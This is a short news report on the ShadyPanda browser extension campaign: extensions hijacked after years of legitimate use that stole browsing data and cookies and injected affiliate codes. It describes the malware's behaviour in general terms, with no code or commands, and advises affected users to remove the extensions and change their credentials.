A threat actor known as ShadyPanda has been linked to a browser extension campaign that has amassed over 4.3 million installations over seven years. According to a report by Koi Security, five of these extensions, which were legitimate in their early days, were modified in mid-2024, attracting up to 300,000 installations before being removed from the stores.
We sell you spyware!
These extensions now execute code remotely, allowing arbitrary JavaScript to be downloaded and run with full access to the browser. According to security researcher Tuval Admoni, these tools monitor every visit and exfiltrate browsing history, in addition to collecting users’ browser fingerprints. Some extensions covertly inject tracking codes when visiting popular sites like eBay and Amazon, generating illicit commissions from users’ purchases.
The situation worsened when, in 2024, the attack evolved to include active control of the browser by redirecting search queries and exfiltrating cookies from specific domains. Extensions can also carry out ‘man-in-the-middle’ attacks, facilitating credential theft and code injection on websites.
Although the malicious activity was first observed in 2023, when 20 extensions were published in the Chrome Web Store and 125 in Microsoft Edge, the manipulation of these programs suggests a systematic exploitation of vulnerabilities that has persisted for years. Koi Security warns users who have installed these extensions to remove them immediately and rotate their credentials, as the auto-update mechanism, designed to maintain security, has become an attack vector.
The story of ShadyPanda highlights the need for more rigorous oversight of browser extensions, as marketplaces review applications at the time of submission but do not monitor their behavior after approval.